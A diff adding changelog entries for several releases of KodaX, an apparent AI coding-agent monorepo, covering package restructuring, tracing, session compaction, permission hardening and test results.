+ - `truncatePlanForDisplay` helper and the head+tail truncation path: superseded by LLM-side length budget (FEATURE_075 prompt constraint) + InkREPL scroll + readline native scroll.
777
+
778
+ ### Documentation
779
+ - `docs/features/v0.7.25.md`: 075 scope narrowed (dropped editor + markdown, added LLM prompt structural constraint), 076 Q1-Q4 decisions captured, 058 section added with FEATURE_057 dependency-free rationale.
780
+ - `docs/features/v0.8.0.md`: FEATURE_058 moved out to v0.7.25 with migration note.
781
+ - `docs/FEATURE_LIST.md`: FEATURE_051 / FEATURE_058 / FEATURE_075 / FEATURE_076 marked Completed; v0.7.25 progress recorded; "Current released version" bumped to v0.7.25.
782
+
783
+ ### Test Status
784
+ - **coding**: 600/600 pass (+36 round-boundary, +4 token-accounting, +1 registry tests).
785
+ - **repl**: 830/830 pass (+11 scrollback-dump, +4 key-actions, +1 DialogSurface scroll; tool-confirmation truncation tests replaced with full-preservation test).
786
+ - **Full monorepo**: 2621 passing / 5 pre-existing baseline failures (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` × 2 strikethrough-row drift, `packages/ai/.../base.test.ts` rate-limit timing flake) — identical to v0.7.24 baseline. **0 new regressions.**
787
+
788
+ ---
789
+
790
+ ## [0.7.24] - 2026-04-20
791
+
792
+ ### Added
793
+ - **FEATURE_082 — Package Restructure**: extract Layer A primitives and observability surfaces into 4 new workspace packages, leaving `@kodax/coding` as the coding-preset shell:
794
+ - `@kodax/core` (new): `Agent` / `Handoff` / `Runner` / `Guardrail` / `AgentReasoningProfile` / `Session` / `SessionEntry` / `MessageEntry` / `SessionExtension` / `CompactionPolicy` / `DefaultSummaryCompaction` / `Capability*` types relocated from `packages/coding/src/primitives/` (1478 LoC, 29 tests)
795
+ - `@kodax/tracing` (new): `Trace` / `Span` / `SpanData` discriminated union (8 variants — Agent / Generation / ToolCall / Handoff / Compaction / Guardrail / Evidence / Fanout) + `TracingProcessor` interface + `defaultTracer` (1112 LoC, 15 tests)
796
+ - `@kodax/session-lineage` (new): `LineageExtension` + `LineageCompaction` relocated from `packages/coding/src/extensions/lineage.ts` (514 LoC, 13 tests)
797
+ - `@kodax/mcp` (new): full MCP capability provider relocated from `packages/coding/src/capabilities/providers/mcp/*` — preserves all 5 progressive-disclosure modes (lazy connect / two-tier descriptors / search-describe / elicitation / cache); `@kodax/coding` retains a thin adapter (`capabilities/providers/mcp-adapter.ts`) bridging the new package to its `CapabilityProvider` registry (3125 LoC, 28 tests)
798
+ - `@kodax/capabilities` **dropped** (FM-2): the planned shell would have shipped empty; per CLAUDE.md "3+ real cases 才抽象" rule, will be recreated when `FEATURE_084` (v0.7.26) lands Scout/Planner/Generator/Evaluator. Final package count: 9 (planned 10).
799
+ - cli-events cleanup **deferred** to `FEATURE_086` (v0.7.27): isolated relocation would create `ai`→`coding` circular dep; clean fix needs full Provider+registry rewrite, out of 082 scope. v0.7.27 design doc updated with item #9 capturing this work.
800
+ - **FEATURE_083 — Unified Tracer / Span / TracingProcessor**: introduce a single observability model across all primitives:
801
+ - `TracingProcessor` lifecycle: `onSpanStart` / `onSpanEnd` / `onTraceEnd` / `shutdown`
802
+ - `ConsoleTracingProcessor` (OTLP-ish stdout) + `FileTracingProcessor` (`.kodax/.traces/{traceId}.jsonl`, serialised `writeChain` so `shutdown()` awaits all in-flight flushes — fixes race vs fire-and-forget)
803
+ - `Runner` accepts `tracer` in `RunOptions`; `PresetDispatcher` gains 4th arg `PresetTracingContext`; SA path emits `AgentSpan` + `GenerationSpan` around `runKodaX` as **dual emission** (old trace events kept `@deprecated` for v0.7.27 removal) — zero behavior change for existing consumers
804
+ - `examples/otel-export.ts`: `PseudoOtelProcessor` showing how external consumers wire OpenTelemetry / Langfuse on top of the new model
805
+ - **FEATURE_093 (partial) — Coding + REPL Internal Circular Dependency Cleanup**: opportunistic cleanup while the restructure already touched all import paths. Reduced madge cycles from ~50 to 1 (98% elimination, 0 inter-package, 1 intra-package remaining):
806
+ - `coding`: `extensions/runtime-contract.ts` narrow 6-method interface replaces full `KodaXExtensionRuntime` reference in `types.ts` hub (~40 cycles broken); `agent.ts` does a single `as KodaXExtensionRuntime` cast at the entry point; `child-executor.ts` uses computed-spec dynamic import to break `tools→agent` edge; `agent.ts` removes vestigial `KodaXClient` re-export in favor of the barrel
807
+ - `repl`: split `tui/components`, `ui/shortcuts`, `completers`, and `project-harness` imports to reach concrete files (`renderer-runtime.ts`, `useShortcut.ts`, `completers/types.ts`, `project-harness-types.ts`) instead of barrel re-exports; test mocks updated to match
808
+ - Remaining: 1 intra-package cycle in `repl/commands` (builtin↔interactive↔index triangle, blocked by ~1900-line `BUILTIN_COMMANDS` array) — kept for the dedicated `FEATURE_093` pass at v0.8.0
809
+
810
+ ### Changed
811
+ - `@kodax/coding/src/extensions/types.ts`: `CapabilityKind` / `CapabilityProvider` / `CapabilityResult` re-exported from `@kodax/core` (lifted to Layer A so third-party RAG / custom-index providers can implement against a stable contract)
812
+ - `Runner` `RunOptions.tracer` field added (optional; if omitted, the 3-arg dispatcher fast path remains unchanged)
813
+
814
+ ### Documentation
815
+ - `docs/features/v0.7.24.md`: Implementation Notes section with slice breakdown (LoC + file count per slice), design deviations (FM-2 capabilities drop, P3 cli-events deferral, Capability type extraction), FEATURE_093 opportunistic completion, test summary, final dependency graph
816
+ - `docs/features/v0.7.27.md` (FEATURE_086): added item #9 capturing the deferred cli-events relocation work
817
+ - `docs/features/v0.8.0.md`: added FEATURE_093 section documenting the remaining 1-cycle scope (`repl/commands` triangle blocker)
818
+ - `docs/FEATURE_LIST.md`: FEATURE_082 and FEATURE_083 marked Completed; FEATURE_093 added to Planned; v0.7.24 progress recorded; "Current released version" bumped to v0.7.24
819
+
820
+ ### Test Status
821
+ - Full monorepo suite: **2561 pass / 5 baseline failures** — all 5 pre-existing since v0.7.23 (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` × 2 strikethrough-row drift, `packages/ai/.../base.test.ts` rate-limit timing flake); confirmed unaffected by this release.
822
+ - **0 new regressions** across 4 new packages (`@kodax/core`, `@kodax/tracing`, `@kodax/session-lineage`, `@kodax/mcp`) and adapter (`mcp-adapter`).
823
+
824
+ ### Final Dependency Graph (pure DAG, madge-verified)
825
+ ```
826
+ ai (leaf) tracing (leaf) skills (leaf)
827
+ agent → ai
828
+ core → ai, tracing
829
+ session-lineage → ai, core
830
+ mcp → ai, core
831
+ coding → agent, ai, core, mcp, session-lineage, skills
832
+ repl → coding, skills
833
+ ```
834
+
835
+ ---
836
+
837
+ ## [0.7.23] - 2026-04-20
838
+
839
+ ### Added
840
+ - **FEATURE_080 + FEATURE_081 — Layer A Primitives + Session/Compaction Split**: introduce the KodaX Agent-as-data surface (`@experimental`) under `@kodax/coding`:
841
+ - `Agent` / `Handoff` / `Guardrail` / `AgentReasoningProfile` declarative types + `createAgent` / `createHandoff` factories (`packages/coding/src/primitives/agent.ts`)
842
+ - `Session` / `SessionEntry` / `MessageEntry` / `SessionExtension` base types + `createInMemorySession` (`packages/coding/src/primitives/session.ts`)
843
+ - `CompactionPolicy` interface + `DefaultSummaryCompaction` (token-threshold + LLM-summary, standalone, zero KodaX-runtime dependency) (`packages/coding/src/primitives/compaction.ts`)
844
+ - `Runner` class with generic LLM-callback path and preset dispatcher registry (`packages/coding/src/primitives/runner.ts`)
845
+ - `createDefaultCodingAgent()` + Option-Y preset dispatcher: `Runner.run(defaultCodingAgent, prompt, { presetOptions })` routes to `runKodaX(presetOptions, prompt)` — API surface goes through `Runner`, body stays on the existing SA path unchanged until FEATURE_084 rewrites it (`packages/coding/src/primitives/coding-preset.ts`)
846
+ - Scout / Planner / Generator / Evaluator declared as `Agent` placeholders ready for the FEATURE_084 runtime rewrite (`packages/coding/src/primitives/task-engine-agents.ts`)
847
+ - `LineageExtension` SessionExtension with `label` / `attachArtifact` operators and `buildLineageTree` reducer (`packages/coding/src/extensions/lineage.ts`)
848
+ - SDK-consumer example (`examples/embedded-agent.ts`)
849
+ - 40 new unit tests across compaction / lineage / runner / coding-preset / role agents; all passing.
850
+
851
+ ### Changed
852
+ - `compactMessages()` in `@kodax/agent` marked `@deprecated`; superseded by the `CompactionPolicy` interface + `DefaultSummaryCompaction`. Scheduled for removal in FEATURE_086 (v0.7.27).
853
+
854
+ ### Documentation
855
+ - `docs/FEATURE_LIST.md`: FEATURE_080 and FEATURE_081 marked Completed; v0.7.23 progress recorded.
856
+ - `docs/features/v0.7.23.md`: Implementation Notes section with slice breakdown, Option-Y rationale, placement deviation (LineageExtension lives in `@kodax/coding` until the v0.7.24 package restructure), code-review resolutions, and acceptance-criteria checklist.
857
+
858
+ ### Zero-Behavior Change Guarantee
859
+ - `runKodaX` / `runManagedTask` / `KodaXClient` bodies untouched.
860
+ - `packages/coding/src/task-engine.test.ts` 50/50 pass (behavior snapshot unchanged).
861
+ - Full monorepo suite: 2484 pass / 4 fail — all 4 pre-existing baseline failures (`tests/kodax_cli`, `tests/kodax_core`, `tests/tracker-consistency` count drift on strikethrough rows, `packages/ai/.../base.test.ts` rate-limit timing flake); confirmed unaffected by this release via `git stash` baseline comparison.
862
+
863
+ ---
864
+
865
+ ## [0.7.22] - 2026-04-19
866
+
867
+ ### Added
868
+ - **FEATURE_079 — Task Engine Phase 1 Pure Extraction**: Split task-engine.ts (9034 → ~7271 lines) into 14 internal modules under `task-engine/_internal/` — constants, text-utils, formatting, protocol (parse-helpers + sanitize), managed-task (budget, checkpoint, workspace), and prompts (role-prompt, role-agent, role-prompt-types, tool-policy, runtime-execution-guide). Zero behavior changes; all extracted functions are pure moves with deferred items documented in code comments.
869
+
870
+ ### Fixed
871
+ - **Pre-existing test regressions (5 tests)**: `resilience.test.ts` — align `streamIdleTimeoutMs` assertion with intentional default change (60000 → 0); `agent.extension-runtime.test.ts` — add `reasoningMode:'off'` to 2 tests to prevent auto-follow-up interference; `agent.provider-policy.test.ts` — add `repoIntelligenceMode:'off'` to skip expensive repo-intelligence build in policy-block tests. Full suite now 584/584 green.
872
+
873
+ ### Documentation
874
+ - Update `docs/FEATURE_LIST.md` and `docs/features/v0.7.22.md` with FEATURE_079 progress
875
+
876
+ ---
877
+
878
+ ## [0.7.21] - 2026-04-19
879
+ ### Fixed
880
+ - **FEATURE_077 — Session-Scoped Prompt Input History**: REPL prompt input history now survives the `Ctrl+O` transcript-mode toggle. Previously a single `Ctrl+O` caused `<PromptComposer>` to unmount and silently wiped the Up-arrow history; the entries array has been lifted above the composer lifecycle so history persists for the whole REPL session. Navigation cursor and draft placeholder still reset on remount to preserve pre-existing behavior.
881
+
882
+ ### Documentation
883
+ - Remove `docs/features/v1.0.0.md` (all features migrated to earlier versions)
884
+ - Add feature docs for v0.7.22, v0.7.23, v0.7.24, v0.7.26–v0.7.29, v0.7.31, v0.7.32
885
+ - Update `KNOWN_ISSUES.md`, `v0.8.0.md`, and `features/README.md` references
886
+
887
+ ---
888
+
889
+ ## [0.7.20] - 2026-04-18
890
+ ### Added
891
+ - **FEATURE_072 — Lineage-Native Compaction Migration**: post-compact attachments stored as a first-class `KodaXSessionCompactionEntry.postCompactAttachments` field instead of inline `[Post-compact: ...]` system messages; `getSessionMessagesFromLineage` slicer inlines attachments at the derivation layer, preserving `getContextMessagesForEntry`'s 1-to-1 contract (FEATURE_073 prerequisite); `evictOldIslandMessageContent` strips attachments on old-island compaction entries (prevents N-round × ~50k token accumulation); `cloneForkableEntry` deep-clones attachments on `/fork`; `applySessionCompaction` signature gains a typed `postCompactAttachments` parameter with defensive strip of inline messages; `CompactionUpdate.postCompactAttachments` routes attachments from agent.ts to REPL natively; `onIterationEnd.info.scope: 'parent' | 'worker'` field prevents worker token counts from overwriting the parent REPL's context snapshot; Scout `initialMessages` derived from lineage across three REPL call-sites (`repl.ts`, `InkREPL.tsx`, `project-commands.ts`); `applyLineageTruncation` pure helper reserved for graceful-degradation writeback
892
+ - **FEATURE_074 — Subagent Permission Boundary Hardening**: plan-mode propagation to child agents via live predicate closure over parent state (mid-run `plan ↔ accept-edits` toggles reach in-flight children immediately); independent `exit_plan_mode` tool with tri-state callback (`boolean | 'not-in-plan-mode'`) so misuse outside plan mode surfaces as an explicit tool error; `set_permission_mode` callback no longer forwarded into `KodaXToolExecutionContext` (fails closed on child invocations); system-temp paths exempted from `isAlwaysConfirmPath` so `accept-edits` and `auto-in-project` no longer force confirmation for writes to `$TMP` / `os.tmpdir()`
893
+
894
+ ### Fixed
895
+ - **Issue 119 — Scout-scope-driven mutation intent**: replace pre-Scout `mutationSurface` heuristic with `inferScoutMutationIntent()` that derives mutation guard from Scout's actual scope output (`review-only` / `docs-scoped` / `open`); prevents stale pre-Scout heuristic from blocking legitimate code edits when Scout upgrades a docs-flagged task to H1
896
+ - **Post-compact context monotonic growth (v0.7.18 regression)**: six surgical fixes — graceful degradation gate rekeyed from reference equality to token-count comparison (P1), circuit breaker tripping after partial-success attempts (P2), `generateSummary` throws on empty LLM text (P3), `injectPostCompactAttachments` strips prior `[Post-compact: ...]` messages before injection (P4), absolute caps `POST_COMPACT_TOKEN_BUDGET = 50_000` and `POST_COMPACT_MAX_TOKENS_PER_FILE = 5_000` (P5), REPL finally-block rebuilds `context.contextTokenSnapshot` from local messages to clear worker-leaked snapshots (P6)
897
+ - **Memory pressure**: eliminate React dev-mode leak, lineage clone bloat (`cloneMessage` returns identity), and streaming churn
898
+ - **Task engine routing**: trust Scout routing authority, fix ceiling clamp context-loss bug; evaluator prompt uses effective ceiling, not stale heuristic
899
+ - **Global kodax bin**: route through CJS preload shim for Node resolution on Windows
900
+
901
+ ### Changed
902
+ - **Scratch scripts**: directed to `.agent/tmp/` instead of `.agent/` root for a cleaner workspace layout
903
+
904
+ ### Documentation
905
+ - **FEATURE_072 acceptance close-out**: verified and checked off all 12 completed acceptance criteria with file:line code evidence; 3 items explicitly deferred (6-consumer migration, bounded-growth integration test, snapshot coherence) with status notes; P4/P6 retirement plan updated — now retained indefinitely after FEATURE_073 cancellation
906
+ - **FEATURE_074 acceptance verification**: all 8 acceptance criteria verified against code (`set_permission_mode` removal, child exclusion, live plan-mode predicate, `exit_plan_mode` tool, long-plan fallback, system-temp exemption)
907
+ - **FEATURE_073 cancelled after philosophy review**: no user pain point, no performance improvement, main selling point (`/fork` improvement) self-retracted; design doc retained as future reference
908
+ - **FEATURE_072 manual test guide**: `docs/test-guides/FEATURE_072_v0.7.20_TEST_GUIDE.md` covering `/fork` + `/rewind` across compaction boundary, long-AMA bounded growth, worker scope non-propagation
909
+ - **Roadmap hygiene**: FEATURE_026 (Roadmap Integrity) removed as unnecessary; FEATURE_077 (Session-Scoped Prompt Input History) staged for v0.7.21; FEATURE_073 / 075 / 076 designs staged into v0.7.25
910
+
911
+ ---
912
+
913
+ ## [0.7.19] - 2026-04-16
914
+ ### Added
915
+ - **AMA Scout simplification**: Optional managed protocol and scope reflection for Scout role
916
+ - **Session lineage enhancements**: Extended session lineage types and tree visualization support
917
+ - **Storage improvements**: Expanded interactive storage test coverage and session tree integration
918
+
919
+ ### Fixed
920
+ - **H0 completion signal**: Preserve explicit H0 completion signal and ensure failed H0 has task state
921
+ - **REPL session handling**: InkREPL session state and storage edge case fixes
922
+
923
+ ---
924
+
925
+ ## [0.7.18] - 2026-04-16
926
+ ### Added
927
+ - **FEATURE_064 — Multi-Provider Cost Observatory**: Session cost tracking with `recordUsage()` after each LLM call; `/cost` command shows per-provider and per-role cost breakdown; built-in rate table for 11 providers
928
+ - **FEATURE_065 — MCP OAuth wiring**: OAuth 2.0 + PKCE token acquisition wired into MCP runtime `doConnect()`; cached token reuse and refresh; Authorization header injection for authenticated MCP servers
929
+ - **FEATURE_066 — Permission Hardening**: Bash command risk classifier (safe/normal/dangerous) wired into InkREPL `beforeToolExecute`; dangerous commands always require confirmation; session-scoped denial tracker prevents repeated prompts
930
+ - **FEATURE_067 — Child Agent Execution**: `dispatch-child-tasks` tool with read-only and write fan-out; child-executor with structured briefing, semaphore-based parallelism, abort propagation, and evaluator-assisted merge
931
+ - **FEATURE_068 — Worktree Isolation Tool**: `worktree_create` / `worktree_remove` tools with path traversal guard and safety checks
932
+ - **FEATURE_069 — Session Rewind & Shell Completion**: `/rewind [entry-id|label]` command for in-place session truncation; `kodax completion bash/zsh/fish` CLI subcommand
933
+ - **FEATURE_070 — Context Engine V2**: Microcompaction integration in agent loop; bash-intent extraction for smarter placeholders; user message protection in compression; analysis scratchpad in summary generator; post-compact artifact ledger injection + file content re-injection (top-N modified files); circuit breaker + graceful degradation for compaction failures
934
+ - **FEATURE_071 — AMA Managed Task Resilience**: Worker checkpoint persistence after each AMA phase; `findValidCheckpoint()` with 1h TTL + git commit validation; `resumeManagedTask()` for mid-execution recovery
935
+ - **Extension API helpers**: `api.exec()` for sandboxed shell command execution (env whitelist, timeout); `api.webhook()` for HTTP webhook with timeout support
936
+
937
+ ### Changed
938
+ - **FEATURE_063 — Hook system cancelled**: Standalone hook system (`packages/coding/src/hooks/`) removed (~600 lines); executor capabilities extracted to Extension API helpers (`api.exec()` / `api.webhook()`); Extension system is the single extensibility mechanism
939
+ - **FEATURE_064 — Status bar cost display descoped**: Cost information available only via `/cost` command, not in status bar
940
+
941
+ ### Fixed
942
+ - **Provider resilience**: Backoff improvements, Retry-After header support, ECONNRESET handling, context overflow recovery
943
+ - **Ask-user**: Scroll window, index mapping, multi-question support; ESC cancellation propagation (issue #114)
944
+ - **Tool group refs**: Preserved on ledger kind switch (issue #115)
945
+ - **AMA H0**: Continuation path truthy bug + validation conflict fix
946
+ - **Thinking blocks**: Preserved for Kimi compatibility
947
+ - **Stream resilience**: Stale-round guard (issue #116)
948
+ - **Security**: Worktree path traversal guard; hooks/OAuth/Docker hardening; denial-tracker TTL
949
+
950
+ ---
951
+
952
+ ## [0.7.17] - 2026-04-12
953
+ ### Added
954
+ - **MCP fallback whitelist**: Fallback whitelist, dispose/resetTransport split, documentation for #108-#111
955
+ - **Session history seed conversion**: Tool summary display improvements and v0.7.35 feature docs
956
+ - **Lightweight i18n framework**: Internationalization framework for UI strings with English and Chinese support (en/zh)
957
+ - **End-turn fallback auto-continuation**: Managed protocol end_turn fallback auto-continuation and v0.7.35 Engineering Shell Maturity planning
958
+
959
+ ### Fixed
960
+ - Classify 'aborted' errors as retryable `connection_failure`, simplify transient error hint
961
+
962
+ ---
963
+
964
+ ## [0.7.16] - 2026-04-11
965
+
966
+ ### Added
967
+ - **FEATURE_061 Phase 2 — Scout direct completion**: Scout now completes H0 tasks end-to-end as both judge and executor, eliminating the scout-then-hand-off round-trip
968
+ - **FEATURE_061 Phase 3 — Context continuation across role upgrades**: Scout→Generator (H1) and Scout→Planner (H2) preserve session context, eliminating cold-start context breaks
969
+ - **FEATURE_061 Phase 4 — Role-level subagent capability**: Every core role (Scout/Planner/Generator/Evaluator) can spawn subagents for parallel work via `runOrchestration`
970
+ - **FEATURE_062 — Managed task budget simplification**: Immutable budget model with 2 fields + 4 functions replaces 10 fields + 14 functions; convergence signal inline in `buildWorkerRunOptions`
971
+ - **MCP transport module**: New `transport.ts` for improved MCP provider capability
972
+
973
+ ### Changed
974
+ - **FEATURE_061 Phase 1 — Pre-Scout routing layers removed**: No more LLM routing call, harness guardrails, or Scout bypass before Scout entry; Intent Gate goes straight to Scout
975
+ - **Reasoning pipeline trimmed**: `createReasoningPlan` uses heuristic-only routing; `routeTaskWithLLM` dead-coded (FEATURE_061 Phase 1)
976
+ - **Harness guardrail system simplified**: `applyManagedHarnessGuardrailsToPlan` passes review context without forcing harness floors (FEATURE_061 Phase 1)
977
+ - **Task engine simplified**: ~3200 net lines removed from `task-engine.ts` — tactical flows, budget zones, and pre-Scout bypass paths consolidated
978
+ - **REPL commands updated**: Command types and interactive commands adapted for simplified AMA flow
979
+ - **Status bar and UI surfaces updated**: Status bar, shortcuts, surface status adapted for Scout-first architecture
980
+ - **Clipboard utility hardened**: Improved clipboard handling with expanded test coverage
981
+ - **Provider resilience expanded**: Error classification and resilience tests updated for broader transient pattern coverage
982
+ - **ACP server updated**: ACP server and CLI option helpers updated for Scout-first routing
983
+
984
+ ### Removed
985
+ - `shouldBypassScoutForManagedH0` and Scout bypass path — all AMA tasks now go through Scout (FEATURE_061 Phase 1)
986
+ - `resolveManagedHarnessGuardrail` and pre-Scout harness floor enforcement (FEATURE_061 Phase 1)
987
+ - 3 Tactical Flow variants (`runTacticalReviewFlow`, `runTacticalInvestigationFlow`, `runTacticalLookupFlow`) — replaced by role-level subagent capability (FEATURE_061 Phase 4)
988
+ - Budget zone functions (`resolveBudgetZone`, `resolveWorkerIterLimits`, `formatBudgetAdvisory`, reserve logic) — replaced by simple cap/used model (FEATURE_062)
989
+ - ~3200 net lines removed across task-engine, reasoning, and related modules
990
+
991
+ ---
992
+
993
+ ## [0.7.15] - 2026-04-10
994
+
995
+ ### Added
996
+ - **Fullscreen transcript surface rewrite**: Local renderer replaces Ink substrate for fullscreen REPL — vendored renderer, localized terminal hooks, renderer-native transcript interaction, and explicit transcript mode replacing implicit review mode
997
+ - **REPL cockpit substrate**: New prompt input controller with deep keyboard routing, footer surfaces for help/notices/queued state, transcript-native tool explanations, and owned TUI compatibility layer
998
+ - **Feature 045 provider-resilience**: Stream resilience across all provider layers with expanded transient error detection, Scout H0 tool policy fix, and prompt waiting/busy terminal state clarification
999
+ - **AMA tactical fan-out**: Investigation fan-out slice, lookup triage, and generalized reduction for AMA tactical planning; centralized branch lifecycle in scheduler; child-fanout restricted to runtime-backed review validation
1000
+ - **Harness calibration and persistence**: Harness calibration corpus and checkpoint profiling, pivot persistence substrate, and workspace runtime truth (Feature 053)
1001
+ - **Durable memory anchors**: First-class retrieval substrate with durable memory anchors, sectionized prompt assembly with prompt snapshot contracts
1002
+ - **Multimodal artifact input substrate**: Align multimodal prompt artifact transport for rich content flows
1003
+ - **Official sandbox extension substrate**: New sandbox extension package foundation
1004
+ - **Incremental repo intelligence refresh**: Incremental update support for repo intelligence artifacts
1005
+ - **Feature 055 REPL hardening**: REPL substrate hardening with bracketed paste protocol (replacing timing-based detection), busy prompt shell virtualization, and graceful exit flow serialization
1006
+ - **Renderer viewport truth alignment**: Transcript scroll now uses renderer-accurate viewport geometry
1007
+
1008
+ ### Changed
1009
+ - **Fullscreen REPL localized from Ink**: Renderer internals, core engine shell, root primitives, input parsing, and terminal runtime hooks all localized; Ink substrate fully isolated
1010
+ - **Transcript surface refactored**: Transcript body/footer separated, search moved into transcript footer, windowing moved into scrollbox, surface lifecycle finalized
1011
+ - **Prompt shell split from transcript shell**: Separate prompt shell policy with hardened exit flow and interactive exit lifecycle cleanup
1012
+ - **Repointel skill reorganized**: Follows Claude Code Skills spec; host integration refactored
1013
+ - **Legacy project shell retired**: Removed from REPL surface
1014
+ - **Prompt sectionization**: Prompt assembly sectionized with snapshot contracts for reproducibility
1015
+
1016
+ ### Fixed
1017
+ - Fullscreen banner moved into transcript history for correct ordering
1018
+ - MCP typing and transcript chrome behavior stabilized
1019
+ - Transcript selection rooted in rendered geometry
1020
+ - Prompt streaming feedback simplified
1021
+ - Native transcript browser controls, footer separators, and mouse selection restored
1022
+ - Native clipboard preferred on local terminals
1023
+ - Transcript viewport budget aligned; spinner liveness restored
1024
+ - Transcript compact output truncation fixed
1025
+ - REPL status colors and banner logo restored after regression
1026
+ - Message list hook order regressions fixed
1027
+ - Prompt editing shortcuts exposed in help and registry
1028
+ - Transcript search anchoring and keyboard routing tightened
1029
+ - Docs-only technical docs kept out of H2 reasoning path
1030
+ - Pruning gap ratio added to prevent repeated shallow compaction
1031
+ - Wheel history and banner unsticking on risky hosts
1032
+
1033
+ ---
1034
+
1035
+ ## [0.7.14] - 2026-04-02
1036
+
1037
+ ### Added
1038
+ - **Repo-intelligence dirty snapshot strategy and inventory tracking**: Dirty snapshot support for memoized reuse across requests, baseline/inventory files for clean git baseline tracking, file analysis index and dirty source hint caching
1039
+
1040
+ ### Changed
1041
+ - Bump repo-intelligence schema versions (index: 1→3, query: 2→9)
1042
+ - Sort dependencies alphabetically in package.json
1043
+
1044
+ ---
1045
+
1046
+ ## [0.7.13] - 2026-03-31
1047
+
1048
+ ### Added
1049
+ - **FEATURE_045: Provider Stream Resilience and Graceful Recovery**: Comprehensive stream resilience improvements across all provider layers — expanded transient error detection with 21 message patterns, retry delay interruptible via AbortSignal, enhanced streaming robustness for Anthropic/OpenAI/custom providers
1050
+ - **User-Agent compatibility mode**: New `userAgentMode` config field (`compat`/`sdk`) on custom and built-in providers to control User-Agent header for gateway compatibility
1051
+ - **Shell environment hydration**: Resolve API keys and PATH from login shell profiles (bash/zsh/fish) when not available in the current process environment; null-delimited parsing with sentinel-based extraction
1052
+ - **Multi-tool call tracking**: Refactored single `activeToolCall` into array-based `activeToolCalls` for concurrent tool call tracking in the UI layer
1053
+ - **Tool confirmation module**: Extracted `buildToolConfirmationPrompt` into dedicated `tool-confirmation.ts` with network/delete command detection
1054
+ - **Managed task live status label**: New `formatManagedTaskLiveStatusLabel` for phase-aware status rendering with worker prefix trimming
1055
+ - **`onToolInputDelta` metadata**: Stream callback now receives optional `toolId` for multi-tool correlation
1056
+ - **New types**: `KodaXProviderUserAgentMode`, `ShellEnvRunner` utility type
1057
+ - **New tests**: Stream resilience (40+ lines), reasoning (75+ lines), task engine (470+ lines), error classification (25+ lines), retry handler (26+ lines), custom providers (104+ lines), InkREPL managed transcript (17+ lines), live streaming (43+ lines), transcript layout (81+ lines), CLI option helpers (47+ lines), ACP server (26+ lines), StatusBar (18+ lines), tool display (6+ lines), extension runtime (123+ lines), provider capability tests (77+ lines)
1058
+
1059
+ ### Changed
1060
+ - **Error classification unified**: Duplicated inline transient pattern checks replaced with `TRANSIENT_MESSAGE_PATTERNS` array and `matchesTransientMessage()` helper
1061
+ - **Retry delay abortable**: `withRetry()` now accepts optional `AbortSignal`; `waitForRetryDelay()` resolves immediately on abort instead of waiting for the full delay
1062
+ - **Tool preview length**: Truncation limit increased from 100 to 240 characters for better tool input visibility
1063
+ - **Managed task breadcrumb**: Added `round` phase support with note propagation
1064
+ - **Transcript layout enhanced**: Expanded with new row types and improved formatting
1065
+
1066
+ ### Removed
1067
+ - **pi-docs directory**: Deleted obsolete `docs/pi-docs/` reference documentation (28 files, ~13k lines)
1068
+
1069
+ ### Documentation
1070
+ - **FEATURE_LIST.md**: Added FEATURE_045 (Provider Stream Resilience), updated tracked feature count to 45
1071
+ - **v0.7.15 feature design**: New design doc for FEATURE_045
1072
+
1073
+ ---
1074
+
1075
+ ## [0.7.12] - 2026-03-30
1076
+
1077
+ ### Fixed
1078
+ - Resolve mojibake (garbled text) in `kodax --help` output, CLI descriptions, and code comments across `kodax_cli.ts` — replaced 16 garbled strings with proper English text
1079
+ - Fix garbled CJK keyword regex in `reasoning.ts` by referencing existing clean pattern constants instead of inline mojibake
1080
+ - Replace separator with `→` in StatusBar routing/scout status display
1081
+ - Propagate CLI model selection through ACP bridge
1082
+
1083
+ ### Changed
1084
+ - Add `.npmrc` to pin `registry.npmmirror.com` for consistent lockfile across machines
1085
+
1086
+ ---
1087
+
1088
+ ## [0.7.11] - 2026-03-30
1089
+
1090
+ ### Added
1091
+ - **Skill-aware AMA role projection**: skill invocations now carry `skillInvocation` metadata into managed execution, `Scout` emits a `skill-map`, and AMA roles consume role-specific skill views instead of sharing the same raw skill prompt
1092
+ - **Skill artifacts for managed tasks**: managed workspaces now persist `skill-execution.md`, `skill-map.json`, and `skill-map.md`
1093
+ - **Same-role round summaries for non-generator roles**: `Scout`, `Planner`, and `Evaluator` now persist a compact previous-round summary that is re-injected on later rounds without restoring full private chat history
1094
+ - **Global work-budget approval loop**: AMA runs use a unified `globalWorkBudget` with repeated `+200` approval extensions near the 90% threshold
1095
+ - **Improved tool disclosure**: REPL tool summaries now prefer target path/scope/cmd details, including explicit `bash` command display
1096
+ - **Interrupted-response persistence test coverage**: new UI regression coverage for Ctrl+C persistence queuing
1097
+ - **FEATURE_044**: Durable Compression Anchors and Artifact Recall spec added to v0.8.0 feature docs
1098
+
1099
+ ### Changed
1100
+ - **AMA simplified**: `H3_MULTI_WORKER`, default `Admission`, `Lead`, and `Contract Reviewer` were removed from the main runtime graph; AMA now operates with `H0_DIRECT`, `H1_EXECUTE_EVAL`, and `H2_PLAN_EXECUTE_EVAL`
1101
+ - **Routing ceilings tightened**: `read-only` and `docs-only` work now stay on `SA/H0` by default, may use `H1` only when the user explicitly asks for stronger checking, and can no longer enter `H2_PLAN_EXECUTE_EVAL`
1102
+ - **Repo scale semantics narrowed**: `reviewScale`, repo size, and changed-scope signals now shape evidence strategy only instead of forcing a heavier harness
1103
+ - **H2 default pass count reduced**: coordinated mutation work now starts with a single main pass and opens extra passes only after structured evaluator failure
1104
+ - **SA semantics clarified**: `SA` now bypasses AMA entirely and runs through the direct single-agent path
1105
+ - **Project + SA continuity clarified**: project-aware direct runs now persist a lightweight run record for status, latest summary, and next-step guidance without entering the managed-task graph
1106
+ - **Intent-first routing**: lightweight `conversation` / `lookup` inputs short-circuit before dirty-repo complexity can escalate them
1107
+ - **Scout and Planner evidence boundaries tightened**: Scout stays pre-harness, Planner is restricted to scope facts plus overview evidence, and Generator owns deep evidence passes
1108
+ - **Pre-Scout routing notes neutralized**: live AMA routing notes now stay provisional until Scout confirms the final harness
1109
+ - **Status bar semantics updated**: `Work used/total` is the primary AMA budget signal; `Round` appears only when a real extra pass exists; AMA no longer falls back to user-visible `Iter x/y`
1110
+ - **Evaluator public-answer contract tightened**: review answers are written directly for the user instead of narrating evaluator-vs-generator meta-review
1111
+ - **Command metadata parity improved**: builtin commands now align more closely with discovered command metadata fields
1112
